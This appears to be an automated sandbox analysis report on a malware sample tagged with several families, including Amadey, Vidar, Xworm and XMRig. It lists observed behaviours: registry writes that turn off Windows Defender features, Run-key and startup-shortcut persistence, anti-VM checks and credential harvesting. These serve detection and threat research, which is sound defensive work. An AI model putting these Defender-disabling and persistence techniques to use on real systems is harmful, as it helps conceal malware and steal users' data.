Analysis Overview
SHA256
f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
Threat Level: Known bad
The file f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e was found to be: Known bad.
Malicious Activity Summary
Systembc family
Modifies Windows Defender notification settings
Amadey
Litehttp family
Modifies Windows Defender TamperProtection settings
Detect Xworm Payload
Modifies Windows Defender DisableAntiSpyware settings
Vidar
Xworm family
Modifies Windows Defender Real-time Protection settings
Vidar family
Xmrig family
SystemBC
Xworm
Detects Healer, an antivirus disabler dropper
Healer
LiteHTTP
Amadey family
Detect Vidar Stealer
xmrig
Healer family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Boot or Logon Autostart Execution: Active Setup
Blocklisted process makes network request
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Drops startup file
Windows security modification
Checks computer location settings
Identifies Wine through registry keys
Loads dropped DLL
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Reads data files stored by FTP clients
.NET Reactor protector
Executes dropped EXE
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Program crash
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of UnmapMainImage
Suspicious use of SetWindowsHookEx
Modifies registry class
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:58
Reported
2025-03-05 23:00
Platform
win7-20240903-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\2b862aa467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\2b862aa467.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a07a872cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\8a07a872cb.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\3bb952ccb1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\3bb952ccb1.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\QanWmXjd\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2d999341a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\a2d999341a.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 852 set thread context of 2752 | N/A | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe |
| PID 1548 set thread context of 1748 | N/A | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe |
| PID 1440 set thread context of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe |
| PID 2636 set thread context of 1056 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 1796 set thread context of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
